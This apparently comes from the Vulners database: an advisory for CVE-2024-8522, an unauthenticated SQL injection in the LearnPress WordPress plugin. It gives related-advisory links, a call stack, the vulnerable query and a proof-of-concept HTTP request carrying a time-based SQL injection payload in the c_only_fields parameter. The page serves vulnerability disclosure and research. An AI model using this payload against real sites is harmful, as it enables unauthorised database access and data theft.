Vulners
Lucene search
WordPress LMS 4.2.7 SQL Injection Vulnerability
| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
 | Exploit for SQL Injection in Thimpress Learnpress | 19 Sep 202407:04 | β | githubexploit |
 | The vulnerability of the βc_only_fieldsβ parameter in the REST API endpoint /wp-json/learnpress/v1/courses of the LearnPress plugin for the WordPress content management system allows a hacker to execute arbitrary SQL code. | 18 Feb 202500:00 | β | bdu_fstec |
 | CVE-2024-8522 | 12 Sep 202410:08 | β | circl |
 | WordPress plugin LearnPress SQL注ε ₯ζΌζ΄ | 12 Sep 202400:00 | β | cnnvd |
 | CVE-2024-8522 | 12 Sep 202408:30 | β | cve |
 | CVE-2024-8522 LearnPress β WordPress LMS Plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_only_fields' | 12 Sep 202408:30 | β | cvelist |
 | LearnPress WordPress LMS Plugin 4.2.7 - SQL Injection | 11 Apr 202500:00 | β | exploitdb |
 | WordPress LearnPress Unauthenticated SQLi (CVE-2024-8522, CVE-2024-8529) | 17 Oct 202418:54 | β | metasploit |
 | LearnPress < 4.2.7.1 - SQL Injection | 8 Jun 202604:09 | β | nuclei |
 | CVE-2024-8522 | 12 Sep 202409:15 | β | nvd |
10
# CVE-2024-8522
LearnPress β WordPress LMS Plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_only_fields'
## Stack
```txt
class-lp-db.php:702, LP_Database->execute()
class-lp-course-db.php:564, LP_Course_DB->get_courses()
Courses.php:241, LearnPress\Models\Courses::get_courses()
class-lp-rest-courses-v1-controller.php:502, LP_Jwt_Courses_V1_Controller->get_courses()
class-wp-rest-server.php:1230, WP_REST_Server->respond_to_request()
class-wp-rest-server.php:1063, WP_REST_Server->dispatch()
class-wp-rest-server.php:439, WP_REST_Server->serve_request()
rest-api.php:420, rest_api_loaded()
class-wp-hook.php:324, WP_Hook->apply_filters()
class-wp-hook.php:348, WP_Hook->do_action()
plugin.php:565, do_action_ref_array()
class-wp.php:418, WP->parse_request()
class-wp.php:813, WP->main()
functions.php:1336, wp()
wp-blog-header.php:16, require()
index.php:17, {main}()
```
## <>
```txt
SELECT <> FROM wp_posts AS p WHERE 1=1 AND p.post_type = 'lp_course' AND p.post_status IN ('publish') ORDER BY post_date DESC LIMIT 0, 10
```
## PoC
```http
GET /wp-json/learnpress/v1/courses?c_only_fields=IF(COUNT(*)!=-2,(SLEEP(10)),0) HTTP/1.1
Host: localhost:8077
User-Agent: curl/7.81.0
Cookie: XDEBUG_SESSION=PHPSTORM
Accept: */*
```
Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Sep 2024 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.17.5 - 10
EPSS0.8713
SSVC